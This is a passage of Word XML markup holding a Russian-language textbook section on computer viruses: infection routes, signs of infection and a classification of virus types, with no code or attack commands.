      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>го диска вирусами может произойти при загрузке компьютера с дискеты, с</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>держащей вирус. Такое заражение может быть и случайным, например, если дискету не вынули из дисковода А: и перезагрузили компьютер, при этом ди</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>с</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>кета может и не быть системной. Заразить дискету гораздо проще. На нее вирус может попасть, даже если дискету просто вставили в дисковод зараженного компьютера и, например, прочитали ее оглавление.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Зараженный диск </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>– это диск, в загрузочном секторе которого находится программа – вирус.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>После запуска программы, содержащей вирус, становится возможным з</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ражение других файлов. Наиболее часто вирусом заражаются загрузочный се</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>к</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>тор диска и исполняемые файлы, имеющие расширения EXE,COM, SYS или ВАТ. Крайне редко заражаются текстовые и графические файлы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Зараженная программа </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>– это программа, содержащая внедренную в нее программу-вирус.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>При заражении компьютера вирусом очень важно своевременно его обн</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">ружить. Для этого следует знать об основных признаках проявления вирусов. К ним можно отнести следующие: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>прекращение работы или неправильная работа ранее успешно функци</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>нировавших программ;</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медленная работа компьютера;</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невозможность загрузки операционной системы;</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исчезновение файлов и каталогов или искажение их содержимого;</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изменение даты и времени модификации файлов;</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изменение размеров файлов;</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неожиданное значительное увеличение количества файлов на диске;</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существенное уменьшение размера свободной оперативной памяти;</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вывод на экран непредусмотренных сообщений или изображений;</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подача непредусмотренных звуковых сигналов;</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частые зависания и сбои в работе компьютера.</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shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Следует заметить, что вышеперечисленные явления необязательно выз</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ы</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ваются присутствием вируса, а могут быть следствием других причин. Поэтому всегда затруднена правильная диагностика состояния компьютера.</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b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Основные виды вирусов</w:t>
      </w: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В настоящее время известно более 5000 программных </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">вирусов, </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>их можно классифицировать по следующим признакам (рис. 1):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>- среде обитания;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="113"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>способу заражения среды обитания;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="113"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>воздействию;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="113"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>особенностям алгоритма.</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В зависимости от среды обитания вирусы можно разделить на сетевые, файловые, загрузочные и файлово-загрузочные. </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Сетевые вирусы </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>распростр</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">няются по различным компьютерным сетям. </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Файловые вирусы </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">внедряются главным образом в исполняемые модули, т.е. в файлы, имеющие расширения СОМ и ЕХЕ. Файловые вирусы могут внедряться и в другие типы файлов, но, как правило, записанные в таких файлах, они никогда не получают управление и, следовательно, теряют способность к размножению. </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Загрузочные вирусы </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>внедряются в загрузочный сектор диска (Boot-сектор) или в сектор, содерж</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">щий программу загрузки системного диска (Master Boot Record). </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Файлово-загрузочные вирусы </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>заражают как файлы, так и загрузочные сектора дисков.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5775960" cy="4076700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="58" name="Рисунок 16" descr="http://nashaucheba.ru/docs/14/13139/conv_1/file1_html_m39d9bb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nashaucheba.ru/docs/14/13139/conv_1/file1_html_m39d9bb26.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75960" cy="4076700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Рис. 1. </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Классификация компьютерных вирусов:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">а </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">– по среде обитания; </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">б </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>– по способу заражения;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">в </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">– по степени воздействия; </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>г</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> – по особенностям алгоритмов</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pP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По способу заражения вирусы делятся на резидентные и нерезидентные. </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Резидентный вирус </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>при заражении (инфицировании) компьютера оставляет в оперативной памяти свою резидентную часть, которая потом перехватывает обращение операционной системы к объектам заражения (файлам, загрузочным секторам дисков и т.п.) и внедряется в них. Резидентные вирусы находятся в памяти и являются активными вплоть до выключения или перезагрузки комп</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ь</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">ютера. </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Hepезидентные вирусы </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>не заражают память компьютера и являются а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>к</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>тивными ограниченное время.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>По степени воздействия вирусы можно разделить на следующие виды:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="114"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>неопасные</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, не мешающие работе компьютера, но уменьшающие объем свободной оперативной памяти и памяти на дисках, действия таких в</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>русов проявляются в каких-либо графических или звуковых эффектах;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="114"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">опасные </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>вирусы, которые могут привести к различным нарушениям в работе компьютера;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="114"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">очень опасные, </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>воздействие которых может привести к потере пр</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">грамм, уничтожению </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>данных, стиранию информации в системных областях диска.</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По особенностям алгоритма вирусы трудно классифицировать из-за большого разнообразия. Простейшие вирусы - </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">паразитические, </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>они изменяют содержимое файлов и секторов диска и могут быть достаточно легко обнаруж</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">ны и уничтожены. Можно отметить </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">вирусы-репликаторы, </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">называемые </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">червями, </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
